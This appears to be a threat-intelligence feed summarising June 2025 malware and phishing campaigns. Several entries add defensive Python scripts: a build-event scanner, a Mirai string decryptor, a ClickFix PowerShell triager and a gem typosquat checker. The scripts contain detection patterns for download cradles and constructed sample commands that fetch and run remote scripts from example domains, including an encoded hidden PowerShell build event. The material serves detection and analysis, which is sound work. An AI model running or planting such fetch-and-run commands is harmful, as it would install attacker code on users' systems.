Threat Research Feed

2025-06-17
Kimsuky_Targets_Academics_via_Phishing_Campaign
MEDIUM
Intel Source:
ASEC
Intel Name:
Kimsuky_Targets_Academics_via_Phishing_Campaign
Date of Scan:
2025-06-17
Impact:
MEDIUM
Summary:
ASEC researchers have uncovered a phishing campaign by the North Korean state-sponsored group Kimsuky that targets academics and other professionals by impersonating thesis reviewers. The phishing emails carry password-protected Hangul Word Processor (HWP) documents. When the victim opens the file and allows its embedded content to run, it drops several files into the system's temporary directory, including a BAT script that starts a multi-stage infection. The chain installs a PowerShell script that collects system and antivirus information, exfiltrates it to an attacker-controlled Dropbox account and downloads further payloads. The malware also abuses the legitimate remote access software AnyDesk, replacing its configuration files with attacker-supplied versions so that tray icons, windows and other visible signs of a session are hidden. Scheduled task abuse, encoded payloads and staged execution are used to stay hidden and maintain access.
Source: https://asec.ahnlab.com/ko/88419/
2025-06-16
Water_Curse_GitHub_Malware_Campaign
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Water_Curse_GitHub_Malware_Campaign
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have uncovered a broad supply chain campaign by a financially motivated threat actor tracked as Water Curse that targets developers, security professionals and gamers. The actor uses at least 76 weaponized GitHub repositories to deliver multi-stage malware. The initial vector is convincing users to download and compile seemingly legitimate open-source tools: malicious code embedded in the Visual Studio project files runs during the build. This starts an infection chain of VBS and PowerShell scripts that deploys an Electron-based backdoor, which escalates privileges through a UAC bypass, persists via scheduled tasks and interferes with defenses such as Windows Defender and Volume Shadow Copies.
Source: https://www.trendmicro.com/en_us/research/25/f/water-curse.html
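The build-time execution described above is easy to audit before compiling an unfamiliar repository: MSBuild runs PreBuildEvent, PostBuildEvent, PreLinkEvent and any `<Exec>` task in a `<Target>` automatically. The scanner below is an added example, not Trend Micro's tooling and not from the Water Curse repositories; the regexes, the sample project file and its embedded commands are assumptions constructed for the demo.

```python
"""Flag build-time command execution in Visual Studio project files.

Added example, not Trend Micro's tooling. It walks a .csproj/.vcxproj and
reports PreBuildEvent, PostBuildEvent, PreLinkEvent and <Exec Command="..."/>
entries whose command looks like a loader (PowerShell download cradles,
encoded commands, script hosts). The regexes and the sample project are
assumptions constructed for this demo.
"""
import re
import xml.etree.ElementTree as ET

# Patterns typical of in-build droppers; tune for your own build conventions (assumption).
SUSPICIOUS = [
    re.compile(r"powershell(\.exe)?\b.*?(-enc\b|-e\b|encodedcommand)", re.I),
    re.compile(r"(iex\b|invoke-expression|downloadstring|invoke-webrequest|bitsadmin)", re.I),
    re.compile(r"\b(wscript|cscript|mshta|certutil)(\.exe)?\b", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
]

def _local(tag):
    """Strip the MSBuild namespace from an element tag."""
    return tag.split("}", 1)[-1]

def extract_build_commands(project_xml):
    """Return (element, command) pairs for every command MSBuild would run during a build."""
    root = ET.fromstring(project_xml)
    found = []
    for el in root.iter():
        name = _local(el.tag)
        if name in ("PreBuildEvent", "PostBuildEvent", "PreLinkEvent"):
            # Old-style .csproj carries the command as element text; .vcxproj nests a <Command> child.
            text = (el.text or "").strip()
            if text:
                found.append((name, text))
            for child in el:
                if _local(child.tag) == "Command" and (child.text or "").strip():
                    found.append((name, child.text.strip()))
        elif name == "Exec" and el.get("Command"):
            # <Exec> inside a <Target> with BeforeTargets/AfterTargets runs without user interaction.
            found.append(("Exec", el.get("Command")))
    return found

def suspicious_commands(project_xml):
    """Return the build commands that match at least one loader pattern."""
    hits = []
    for element, cmd in extract_build_commands(project_xml):
        matched = [p.pattern for p in SUSPICIOUS if p.search(cmd)]
        if matched:
            hits.append({"element": element, "command": cmd, "matched": matched})
    return hits

# Constructed sample: a benign copy step plus two build-time loaders.
SAMPLE_CSPROJ = """<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PostBuildEvent>xcopy /y "$(TargetPath)" "$(SolutionDir)dist\\"</PostBuildEvent>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)' == 'Release'">
    <PreBuildEvent>powershell -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA</PreBuildEvent>
  </PropertyGroup>
  <Target Name="Stage" BeforeTargets="Build">
    <Exec Command="wscript //B &quot;$(ProjectDir)build\\helper.vbs&quot;" />
  </Target>
</Project>
"""

if __name__ == "__main__":
    for hit in suspicious_commands(SAMPLE_CSPROJ):
        print(hit["element"], "->", hit["command"])
```

Run it over every `*.csproj`, `*.vcxproj` and `Directory.Build.targets` in a checkout before opening the solution; a Release-only `Condition` on a build event, as in the sample, is a common way to keep the loader out of a quick Debug test build.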
2025-06-16
Katz_Stealer
LOW
Intel Source:
Picus Security
Intel Name:
Katz_Stealer
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers from Picus have analysed Katz Stealer, an information-stealing malware-as-a-service (MaaS) offering that emerged in 2025. It is distributed via phishing campaigns and trojanized software and uses a multi-stage infection chain of obfuscated JavaScript droppers, PowerShell loaders and a .NET-based UAC bypass. The stealer runs entirely in memory, hides inside legitimate Windows processes and uses image files to smuggle malicious code. Once on a system it targets browsers such as Chrome and Firefox, email accounts, VPN clients, file transfer programs and cryptocurrency wallets. It also persists in Discord by injecting code that runs each time the application starts, giving the attackers remote access to the system.
Source: https://www.picussecurity.com/resource/blog/understanding-katz-stealer-malware-and-its-credential-theft-capabilities
2025-06-16
Mamba2FA_Credential_Harvesting_Campaign
LOW
Intel Source:
SpiderLabs
Intel Name:
Mamba2FA_Credential_Harvesting_Campaign
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers at SpiderLabs have identified an active phishing campaign using a Phishing-as-a-Service (PhaaS) kit known as Mamba2FA. The attack begins with a lure themed as a "Secure Document Portal" that asks victims to enter their email address to access a purported document. On submission, the user is redirected to a counterfeit Microsoft login page that harvests credentials. The use of a phishing kit and PhaaS infrastructure indicates a commoditized and scalable threat that lets less-skilled actors run effective attacks.
Source: https://x.com/SpiderLabs/status/1932844577355939890
2025-06-16
Hive0131_Targets_Latin_America
MEDIUM
Intel Source:
IBM X-Force
Intel Name:
Hive0131_Targets_Latin_America
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers at IBM X-Force have identified a surge in attacks involving DCRat across Latin America, attributed to the financially motivated threat group Hive0131. The group sends phishing emails impersonating Colombian judicial entities to trick recipients into clicking malicious links embedded in PDFs and Google Docs, which start the infection chain. The campaigns deliver DCRat, a Malware-as-a-Service (MaaS) tool, via obfuscated loaders such as VMDetectLoader, which uses virtual machine detection, AMSI bypass and process hollowing to evade detection. The malware supports surveillance, data exfiltration, command execution and persistence through scheduled tasks or registry keys. Researchers also observed JavaScript and VBScript being used to distribute the malware. Hive0131 appears to have shifted from traditional RATs such as QuasarRAT and NjRAT to more capable payloads like DCRat, which makes detection and removal harder.
Source: https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america
2025-06-16
Mirai_Variant_Exploits_DVRs_via_CVE_2024_3721
LOW
Intel Source:
Securelist
Intel Name:
Mirai_Variant_Exploits_DVRs_via_CVE_2024_3721
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers from Securelist have observed a new Mirai botnet variant actively exploiting a remote code execution vulnerability (CVE-2024-3721) in internet-exposed TBK DVR devices. The campaign uses a crafted POST request to download and execute a malicious ARM32 binary, immediately compromising the device without reconnaissance. The malware is a Mirai variant enhanced with anti-evasion features, including RC4-encrypted strings and checks to detect virtualization and emulation environments.
Source: https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/
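The RC4-encrypted strings mentioned above are the usual first obstacle when triaging a Mirai build: once the key (or a handful of candidates) is pulled from the binary, the string table can be decrypted offline to expose the sandbox checks and attack strings. The script below is an added example, not Securelist's code or the sample's; the table layout (one-byte length prefix per entry), the candidate keys and the encrypted blob are assumptions, and the blob is constructed in the script itself.

```python
"""Recover RC4-encrypted strings from a Mirai-style sample.

Added example, not Securelist's code. Mirai variants keep configuration
strings encrypted and decrypt them at runtime; an analyst who has pulled the
key (or a list of candidate keys) from the binary can decrypt the table
offline. The table layout (one-byte length prefix per entry), the candidate
keys and the encrypted blob are assumptions; the blob is constructed below
with the same routine, using plaintext strings of the kind such samples check.
"""

def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def parse_table(blob):
    """Split a length-prefixed table into its still-encrypted entries."""
    entries, pos = [], 0
    while pos < len(blob):
        n = blob[pos]
        entries.append(blob[pos + 1:pos + 1 + n])
        pos += 1 + n
    return entries

def printable_ratio(data):
    """Fraction of bytes that are printable ASCII; wrong keys give roughly 0.37."""
    return sum(32 <= c < 127 for c in data) / max(len(data), 1)

def recover_strings(blob, candidate_keys, threshold=0.95):
    """Try each candidate key; return (key, strings) for the first that yields printable text."""
    entries = parse_table(blob)
    for key in candidate_keys:
        decrypted = [rc4(key, e) for e in entries]
        if decrypted and all(printable_ratio(d) >= threshold for d in decrypted):
            return key, [d.decode("ascii", "replace") for d in decrypted]
    return None, []

# Constructed sample: strings an anti-analysis Mirai build might carry, encrypted
# entry by entry under one key (assumption about the variant's layout).
DEMO_KEY = b"demo-rc4-key"
DEMO_PLAINTEXTS = [b"/bin/busybox", b"VMware", b"QEMU", b"/proc/cpuinfo", b"hypervisor"]
SAMPLE_BLOB = b"".join(bytes([len(p)]) + rc4(DEMO_KEY, p) for p in DEMO_PLAINTEXTS)
CANDIDATE_KEYS = [b"xmppkey", b"deadbeef", DEMO_KEY]

if __name__ == "__main__":
    key, strings = recover_strings(SAMPLE_BLOB, CANDIDATE_KEYS)
    print("key:", key, "strings:", strings)
```

Because RC4 is symmetric with no integrity check, a wrong key never fails loudly; the printable-ratio test is what tells a correct key from noise, and it is worth lowering the threshold if the real table mixes binary values (IPs, ports) with text.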
2025-06-16
Anubis_RaaS_Group
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Anubis_RaaS_Group
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Trend Micro researchers have analysed a new ransomware strain called Anubis, which operates as a ransomware-as-a-service (RaaS) and has been active since December 2024. Alongside conventional encryption it includes a file-wiping capability, a dual threat that adds pressure on victims to pay. Affiliates gain access through spear-phishing and use privilege escalation, access token manipulation and shadow copy deletion to hamper recovery. Anubis has targeted organizations across several sectors, notably healthcare and construction, with confirmed attacks in Australia, Canada, Peru and the U.S. The group advertises on cybercrime forums such as RAMP and XSS, offering flexible affiliate programs to other criminal groups.
Source: https://www.trendmicro.com/en_us/research/25/f/anubis-a-closer-look-at-an-emerging-ransomware.html
2025-06-16
Spectra_Ransomware_Double_Extortion
MEDIUM
Intel Source:
K7 Labs
Intel Name:
Spectra_Ransomware_Double_Extortion
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers from K7 Security Labs have observed Spectra Ransomware, an emerging double-extortion threat targeting Windows-based systems. Attackers demand a $5,000 Bitcoin payment within a 72-hour deadline, threatening to leak stolen data if victims do not comply. The malware achieves persistence by creating a Run registry key and masquerading as svchost.exe in the AppData folder.
Source: https://labs.k7computing.com/index.php/the-spectre-of-spectraransomware/
2025-06-16
Fileless_AsyncRAT_via_Clickfix_Lure
LOW
Intel Source:
CloudSEK
Intel Name:
Fileless_AsyncRAT_via_Clickfix_Lure
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers at CloudSEK have identified an active fileless malware campaign distributing AsyncRAT to German-speaking users. The attack, ongoing since at least April 2025, begins with a Clickfix-themed website that socially engineers victims into executing a malicious PowerShell command through a fake CAPTCHA prompt. The initial command downloads a second-stage, obfuscated PowerShell script, which then decodes and reflectively loads a C# AsyncRAT payload directly into memory, evading file-based detection. The malware leverages legitimate system utilities like conhost.exe and PowerShell for stealthy execution, establishes persistence via RunOnce registry keys, and communicates with a command-and-control server over TCP port 4444.
Source: https://www.cloudsek.com/blog/fileless-asyncrat-distributed-via-clickfix-technique-targeting-german-speaking-users
2025-06-16
ClickFix_Social_Engineering_Attack_Chain
LOW
Intel Source:
Darktrace
Intel Name:
ClickFix_Social_Engineering_Attack_Chain
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers from Darktrace have observed threat actors, including APT groups like APT28 and MuddyWater, leveraging a social engineering tactic dubbed "ClickFix" to gain initial access and exfiltrate data from organizations. This prolific campaign, observed in early 2025 across EMEA and the United States, targets the human user as the weakest link through phishing or malvertising that directs victims to a fake prompt, such as a CAPTCHA or error message. These prompts trick users into manually executing a malicious PowerShell command, which establishes command and control (C2) communication. This allows attackers to download secondary payloads like XWorm or Lumma, move laterally, and exfiltrate sensitive system information.
Source: https://www.darktrace.com/blog/unpacking-clickfix-darktraces-detection-of-a-prolific-social-engineering-tactic
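Both the CloudSEK AsyncRAT entry and the Darktrace entry above hinge on the same observable: a user-typed PowerShell command, usually launched from the Run dialog, that fetches remote script and evaluates it in a hidden window. The triage script below is an added example, not CloudSEK's or Darktrace's detection content; it scores constructed process-creation records (fields modelled on Sysmon event 1) and decodes `-EncodedCommand` arguments so the cradle is visible even when base64-wrapped. Process IDs, paths and the example-domain URLs are assumptions.

```python
"""Triage process-creation events for ClickFix-style PowerShell launches.

Added example, not CloudSEK's or Darktrace's detection content. A ClickFix
victim pastes a command into the Win+R box (parent explorer.exe) or a
console; the command usually fetches a remote script and evaluates it in a
hidden window. The events below are constructed JSON records whose fields
are modelled on Sysmon event 1 (Image, ParentImage, CommandLine); the URLs
use reserved example domains.
"""
import base64
import json
import re

CRADLE = re.compile(r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|start-bitstransfer)\b", re.I)
HIDDEN = re.compile(r"-(w|win|windowstyle)\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass", re.I)
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext of a -EncodedCommand argument, or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event):
    """Score one process-creation event; returns (score, reasons)."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    reasons = []
    decoded = decode_encoded_command(cmd)
    text = cmd + (" " + decoded if decoded else "")  # match on the decoded command too
    if decoded:
        reasons.append("encoded command decoded: " + decoded[:60])
    if parent.endswith("explorer.exe"):
        reasons.append("launched from explorer.exe (Win+R / Run dialog)")
    if HIDDEN.search(text):
        reasons.append("hidden window or policy-bypass flags")
    if CRADLE.search(text):
        reasons.append("download-and-evaluate cradle")
    urls = URL.findall(text)
    if urls:
        reasons.append("remote URL: " + urls[0])
    return len(reasons), reasons

def flag_events(lines, min_score=3):
    """Parse JSON lines and return (ProcessId, score, reasons) for events at or above min_score."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        score, reasons = triage(ev)
        if score >= min_score:
            hits.append((ev["ProcessId"], score, reasons))
    return hits

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENC = base64.b64encode(
    "iex (iwr https://cdn.example/update.txt -UseBasicParsing)".encode("utf-16-le")).decode()

# Constructed events: a scheduled backup script, a Win+R ClickFix paste, and an encoded variant.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"ProcessId": 3188, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ProcessId": 4412, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -nop -c "irm https://verify.example/v.ps1 | iex"'},
    {"ProcessId": 5120, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoP -Enc " + _ENC},
]]

if __name__ == "__main__":
    for pid, score, reasons in flag_events(SAMPLE_EVENTS):
        print(pid, score, reasons)
```

The explorer.exe parent is the strongest single signal for the Run-dialog variant; when the lure instructs the user to open a terminal instead, the parent will be cmd.exe or WindowsTerminal.exe and the remaining flags carry the score, which is why the threshold is a count rather than a single required feature.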
2025-06-16
APT41_Uses_Google_Calendar_for_C2
MEDIUM
Intel Source:
Resecurity
Intel Name:
APT41_Uses_Google_Calendar_for_C2
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers from Resecurity have reported that the Chinese state-sponsored threat actor APT41, which conducts both espionage and cybercrime, has launched a campaign using Google Calendar as a covert C2 channel. Initial access comes through spear-phishing emails carrying a ZIP archive disguised as export documentation that contains malicious LNK files and decoy images. On execution, a chain of components (PLUSDROP, PLUSINJECT and TOUGHPROGRESS) runs directly in memory, using process hollowing to hide inside legitimate system processes. The final payload, TOUGHPROGRESS, reads commands from attacker-controlled Google Calendar events and returns stolen data by writing it into new calendar entries. The malware is also described as capable of modifying the Windows operating system, which could give the attackers full control of the host and let them erase traces of their activity.
Source: https://www.resecurity.com/blog/article/apt-41-threat-intelligence-report-and-malware-analysis
2025-06-12
Quasar_RAT_via_Obfuscated_Batch_Files
LOW
Intel Source:
ISC.SANS
Intel Name:
Quasar_RAT_via_Obfuscated_Batch_Files
Date of Scan:
2025-06-12
Impact:
LOW
Summary:
Researchers at ISC.SANS have identified an active campaign delivering the Quasar Remote Access Trojan (RAT) through a multi-stage infection process. Threat actors initiate the attack with a simple batch script that opens a decoy document to deceive the user while concurrently using PowerShell to download and execute a second, heavily obfuscated batch file.
Source: https://isc.sans.edu/diary/rss/32036
2025-06-12
Italian_Remcos_Malware_Campaign
MEDIUM
Intel Source:
CERT-AGID
Intel Name:
Italian_Remcos_Malware_Campaign
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Researchers at CERT-AGID have identified a malware campaign targeting Italy, active around June 10-11, 2025. Threat actors are distributing the Remcos Remote Access Trojan (RAT) by email using malicious ZIP attachments. The campaign uses a financial lure with the subject "AV: Avviso di pagamento" (Payment notice) to trick recipients into executing the payload. The "ModiLoader" tag suggests a multi-stage infection chain. The motivation appears to be financial, using the RAT for credential theft, data exfiltration and full remote control of compromised systems.
Source: https://cert-agid.gov.it/wp-content/uploads/2025/06/remcos-11-06-2025.json
2025-06-12
Arkana_Ransomware_Exfiltrates_Brokerage_Data
MEDIUM
Intel Source:
ASEC
Intel Name:
Arkana_Ransomware_Exfiltrates_Brokerage_Data
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Researchers from ASEC have observed the Arkana ransomware group claiming responsibility for a significant data breach at a UK-based global online brokerage firm. The group says it exfiltrated approximately 50 GB of data, including Know Your Customer (KYC) records and customer information, and threatened to leak or sell it if a ransom was not paid by June 10, 2025. The double-extortion attack, publicized on the group's leak site, was aimed at monetizing the stolen data. The incident highlights a severe risk to the financial sector, where exfiltrated KYC data creates a high risk of identity theft and fraud.
Source: https://asec.ahnlab.com/en/88437/
2025-06-12
Fog_Ransomware_Employs_Unusual_Toolset
MEDIUM
Intel Source:
Symantec
Intel Name:
Fog_Ransomware_Employs_Unusual_Toolset
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Symantec researchers have reported an attack on a financial institution in Asia involving Fog ransomware. The operators showed an unusual methodology, blending ransomware deployment with espionage-style tactics. After roughly two weeks of dwell time they deployed an atypical toolset: the legitimate employee monitoring software Syteca for surveillance and the open-source C2 frameworks GC2 and Adaptix for command and control. Notably, the attackers established persistence via a new service after deploying the ransomware, a clear departure from smash-and-grab ransomware behaviour. This post-encryption activity suggests a dual motive: the ransomware may have been a decoy for a longer-term espionage operation, or an opportunistic monetization of an existing intrusion.
Source: https://www.security.com/threat-intelligence/fog-ransomware-attack
2025-06-12
BrowserVenom_Spreads_Via_Fake_AI_Download_Ads
LOW
Intel Source:
Securelist
Intel Name:
BrowserVenom_Spreads_Via_Fake_AI_Download_Ads
Date of Scan:
2025-06-12
Impact:
LOW
Summary:
Researchers from Securelist have identified a malware campaign that exploits interest in the DeepSeek-R1 LLM to distribute an implant dubbed BrowserVenom. The operators, believed to be Russian-speaking based on code comments, use malicious online ads to redirect people searching for DeepSeek-R1 to a fake site that serves a trojanized installer named AI_Launcher_1.21.exe. When executed, the file starts a multi-stage infection involving fake CAPTCHA screens and PowerShell-based defense evasion, then downloads and installs the final payload, BrowserVenom, which installs a malicious certificate and silently reconfigures all major web browsers to route traffic through a malicious proxy. Infections have been observed in Brazil, Cuba, Mexico, India, Nepal, South Africa and Egypt, showing a wide geographical spread.
Source: https://securelist.com/browservenom-mimicks-deepseek-to-use-malicious-proxy/115728/
2025-06-12
DCRat_Targeting_Blockchain_Users
LOW
Intel Source:
Qi'anxin Threat Intelligence Center
Intel Name:
DCRat_Targeting_Blockchain_Users
Date of Scan:
2025-06-12
Impact:
LOW
Summary:
Qi'anxin Threat Intelligence Center and the Skyrocket Falcon team have identified a financially motivated campaign targeting blockchain and cryptocurrency users. Unknown attackers deliver a malicious ZIP archive containing a shortcut file (LNK) via the Telegram messaging application. Execution of the lure file initiates a multi-stage infection process that uses VBScript and PowerShell to download components from cloud storage. The attack leverages DLL side-loading, using legitimately signed executables to load a malicious DLL, which then loads and injects the DCRat remote access trojan (RAT) into memory. This methodology is designed to evade detection by traditional security tools. The attackers' infrastructure also hosts fraudulent cryptocurrency investment websites, indicating the primary objective is theft.
Source: https://ti.qianxin.com/blog/articles/counterfeiting-qianxin-certificates-targeted-attacks-against-blockchain-customers-en/
2025-06-12
Winos_4_0_Behind_Operation_Holding_Hands
MEDIUM
Intel Source:
somedieyoungZZ
Intel Name:
Winos_4_0_Behind_Operation_Holding_Hands
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Researcher somedieyoungZZ has detailed the 'Operation Holding Hands' campaign, a multi-stage attack attributed to the China-linked Silver Fox APT group. Targeting users in Japan and Taiwan, the campaign begins with a phishing lure: a digitally signed executable masquerading as a salary revision notice. This initial payload uses its stolen certificate to appear legitimate while it drops and unpacks subsequent stages using COM objects. The malware employs evasion techniques including DLL search order hijacking and dynamic API resolution via configuration files to minimize its forensic footprint. The final payload is a memory-resident backdoor, identified as Winos 4.0, which connects to hardcoded C2 infrastructure for persistent access and espionage.
Source: https://somedieyoungzz.github.io/posts/silver-fox/
2025-06-11
Transparent_Tribe_DISGOMOJI_Targeting_Linux
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
Transparent_Tribe_DISGOMOJI_Targeting_Linux
Date of Scan:
2025-06-11
Impact:
MEDIUM
Summary:
The 360 Threat Intelligence Center has revealed a new espionage campaign by the South Asian threat actor APT-C-56, also known as Transparent Tribe. The group is targeting Indian government and military personnel with a complex, multi-stage DISGOMOJI malware variant designed for Linux systems. Initial access is gained through social engineering, tricking users into running a Golang ELF loader disguised as a password utility for a lure PDF document. The resilient attack chain uses Google Drive for payload delivery and Google Cloud Platform for command-and-control, bypassing traditional network defenses. Once established, the final payload steals system information, exfiltrates documents, harvests Firefox browser credentials and deploys the MeshAgent remote access tool for long-term persistence.
Source: https://www.ctfiot.com/253976.html
2025-06-11
CYBEREYE_RAT
LOW
Intel Source:
Cyfirma
Intel Name:
CYBEREYE_RAT
Date of Scan:
2025-06-11
Impact:
LOW
Summary:
Cyfirma researchers have identified a new .NET-based malware called CyberEye, also known as TelegramRAT, which is actively distributed through a GitHub repository and Telegram channels operated by threat actors using the aliases @cisamu123 and @CodQu. The malware is produced by a GUI-based builder that lets low-skill cybercriminals generate customized payloads with features such as keylogging, credential theft, clipboard hijacking and persistence mechanisms. CyberEye uses Telegram to communicate with its operators, so they do not need to run their own servers. It turns off Windows Defender through system settings and PowerShell commands and attempts to elevate its privileges. It steals saved browser passwords and session data from apps such as Telegram, Discord and Steam, and sends sensitive files and screenshots back to the attacker.
Source: https://www.cyfirma.com/research/understanding-cybereye-rat-builder-capabilities-and-implications/
2025-06-11
FIN6_Delivers_More_Eggs_Malware
MEDIUM
Intel Source:
DTI
Intel Name:
FIN6_Delivers_More_Eggs_Malware
Date of Scan:
2025-06-11
Impact:
MEDIUM
Summary:
DTI researchers have uncovered a phishing campaign by the financially motivated group Skeleton Spider, also tracked as FIN6, that uses fake job application lures to distribute the More_Eggs malware. The group contacts recruiters on professional job platforms such as LinkedIn and Indeed while posing as job seekers, then sends messages linking to fake resume websites that look legitimate but are attacker-controlled. The sites are registered anonymously and hosted on trusted cloud services such as AWS. The attackers use CAPTCHA challenges, IP-based filtering and behavioral checks to deliver malicious ZIP files only to selected visitors. The payload chain includes a disguised .LNK file that runs JavaScript via wscript.exe, enabling credential theft, command execution and potentially the installation of further payloads such as ransomware. FIN6 abuses cloud services such as Amazon CloudFront and S3 to obscure the origin of the attack and evade detection.
Source: https://dti.domaintools.com/Skeleton-Spider-Trusted-Cloud-Malware-Delivery/
2025-06-10
RubyGems_Exploit_Telegram_Ban_for_Data_Theft
LOW
Intel Source:
Socket
Intel Name:
RubyGems_Exploit_Telegram_Ban_for_Data_Theft
Date of Scan:
2025-06-10
Impact:
LOW
Summary:
Researchers at Socket have identified an ongoing supply chain attack targeting the RubyGems ecosystem, where a threat actor, using Vietnamese-formatted aliases, published malicious gems named fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram around May 24 and May 30, 2025. These gems typosquat legitimate Fastlane plugins and were released shortly after Vietnam's nationwide Telegram ban, exploiting the increased demand for proxy solutions. The malware operates by redirecting Telegram API calls through an attacker-controlled C2 server, silently exfiltrating bot tokens, chat IDs, messages, and files from developers, particularly those using CI/CD pipelines.
Source: https://socket.dev/blog/malicious-ruby-gems-exfiltrate-telegram-tokens-and-messages-following-vietnam-ban
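The two gem names above illustrate the two typosquat shapes a CI pipeline should catch before `bundle install` runs: a trusted plugin's distinctive token with extra words bolted on (telegram-proxy) and a one-letter variation (teleram). The checker below is an added example, not Socket's scanner; the trusted plugin list, the `fastlane-plugin-` namespace assumption and the Gemfile.lock fragment (including its version numbers) are constructed for the demo.

```python
"""Near-match check of locked gems against a trusted plugin list.

Added example, not Socket's scanner. It parses the specs block of a
Gemfile.lock, then compares each gem name with a list of plugins you trust,
flagging names that reuse a trusted plugin's distinctive token with extra
words added (telegram-proxy) or that differ from it by a single edit
(teleram). The trusted list, the namespace prefix and the lockfile fragment
are constructed for the demo.
"""
import re

NAMESPACE = "fastlane-plugin-"  # assumption: the plugin naming convention being squatted

def levenshtein(a, b):
    """Edit distance between two strings (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def normalize(name):
    return name.lower().replace("_", "-")

def tokens(name):
    """Split the part after the namespace into words: 'proxy_teleram' -> ['proxy', 'teleram']."""
    n = normalize(name)
    if n.startswith(NAMESPACE):
        n = n[len(NAMESPACE):]
    return n.split("-")

def locked_gems(lockfile_text):
    """Return {name: version} for top-level entries in the specs: block."""
    gems, in_specs = {}, False
    for line in lockfile_text.splitlines():
        if line.strip() == "specs:":
            in_specs = True
            continue
        if not in_specs:
            continue
        m = re.match(r"^    (\S+) \(([^)]+)\)$", line)  # 4 spaces: a spec; 6 spaces: its dependency
        if m:
            gems[m.group(1)] = m.group(2)
        elif line and not line.startswith(" "):
            in_specs = False  # next section (PLATFORMS, DEPENDENCIES, ...)
    return gems

def suspicious_names(gem_names, trusted, max_distance=1):
    """Return (gem, trusted_plugin, reason) for gems that look like squats of a trusted one."""
    findings = []
    trusted_norm = {normalize(t) for t in trusted}
    for name in gem_names:
        if normalize(name) in trusted_norm:
            continue  # exact match: the real plugin
        for t in trusted:
            for ttok in tokens(t):
                if len(ttok) < 5:
                    continue  # ignore short generic tokens such as "app" or "ci"
                for tok in tokens(name):
                    if tok == ttok:
                        findings.append((name, t, "reuses trusted token '%s' with extra words" % ttok))
                    elif levenshtein(tok, ttok) <= max_distance:
                        findings.append((name, t, "token '%s' is one edit from '%s'" % (tok, ttok)))
    return findings

TRUSTED_PLUGINS = ["fastlane-plugin-telegram", "fastlane-plugin-versioning"]

# Constructed lockfile fragment; versions are illustrative.
SAMPLE_LOCK = """GEM
  remote: https://rubygems.org/
  specs:
    fastlane (2.227.0)
      addressable (>= 2.8, < 3.0.0)
    fastlane-plugin-telegram (0.1.0)
    fastlane-plugin-proxy_teleram (0.1.1)
    fastlane-plugin-telegram-proxy (0.1.0)
    fastlane-plugin-versioning (0.5.2)

PLATFORMS
  ruby

DEPENDENCIES
  fastlane
"""

if __name__ == "__main__":
    for gem, trusted, why in suspicious_names(locked_gems(SAMPLE_LOCK), TRUSTED_PLUGINS):
        print("%s ~ %s: %s" % (gem, trusted, why))
```

Token-level comparison is deliberate: whole-name edit distance between `fastlane-plugin-proxy_teleram` and `fastlane-plugin-telegram` is large, so a plain Levenshtein threshold would miss exactly the case reported here.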
2025-06-10
SharePoint_Phishing_Exploits_Trusted_Links
MEDIUM
Intel Source:
CyberProof
Intel Name:
SharePoint_Phishing_Exploits_Trusted_Links
Date of Scan:
